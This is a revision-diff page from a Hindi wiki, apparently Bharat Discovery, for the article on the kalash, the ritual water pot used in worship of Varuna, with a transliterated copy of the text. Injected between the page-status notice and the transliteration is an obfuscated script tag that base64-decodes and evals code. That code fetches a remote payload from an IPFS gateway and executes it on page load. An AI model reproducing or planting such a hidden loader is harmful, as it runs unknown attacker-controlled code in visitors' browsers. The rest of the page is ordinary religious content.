Difference between revisions of "कलश"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना (को हटा दिया गया हैं।))
Line 1: Line 1:
 
{{incomplete}}
 
{{incomplete}}
 
*धार्मिक विधियों में कलश की स्थापना का एक महत्वपूर्ण विधि है।  
 
*धार्मिक विधियों में कलश की स्थापना का एक महत्वपूर्ण विधि है।  
*इसमें जल देवता, [[वरुण]] की पूजा होती है।  
+
*इसमें [[जल]] देवता, [[वरुण]] की पूजा होती है।  
 
*यह अनुष्ठान शांति और समृद्धि के लिए किया जाता है।  
 
*यह अनुष्ठान शांति और समृद्धि के लिए किया जाता है।  
*एक अथवा एक से अधिक कलशों की (108कलशों) की स्थापना की जाती है।  
+
*एक अथवा एक से अधिक कलशों की (108 कलशों) की स्थापना की जाती है।  
*कलश के एक ही प्रतीक में सभी [[देवता]], सप्त सागर, सप्त सरिता, [[पृथ्वी]], चारों [[वेद]], गायत्री सभी के पापक्षय और शांति के लिए समंवय किया गया है।  
+
*कलश के एक ही प्रतीक में सभी [[देवता]], सप्त सागर, सप्त सरिता, [[पृथ्वी देवी|पृथ्वी]], चारों [[वेद]], [[गायत्री]] सभी के पापक्षय और शांति के लिए समंवय किया गया है।  
 
*जल से भरे कलश के अंदर आम्रपल्लव और उसके ऊपर नारियल रख कर पूजा की जाती है।  
 
*जल से भरे कलश के अंदर आम्रपल्लव और उसके ऊपर नारियल रख कर पूजा की जाती है।  
 +
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 13:20, 20 February 2011

40px panna banane ki prakriya mean hai. ap isako taiyar karane mean sahayata kar sakate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  • dharmik vidhiyoan mean kalash ki sthapana ka ek mahatvapoorn vidhi hai.
  • isamean jal devata, varun ki pooja hoti hai.
  • yah anushthan shaanti aur samriddhi ke lie kiya jata hai.
  • ek athava ek se adhik kalashoan ki (108 kalashoan) ki sthapana ki jati hai.
  • kalash ke ek hi pratik mean sabhi devata, sapt sagar, sapt sarita, prithvi, charoan ved, gayatri sabhi ke papakshay aur shaanti ke lie samanvay kiya gaya hai.
  • jal se bhare kalash ke aandar amrapallav aur usake oopar nariyal rakh kar pooja ki jati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sambandhit lekh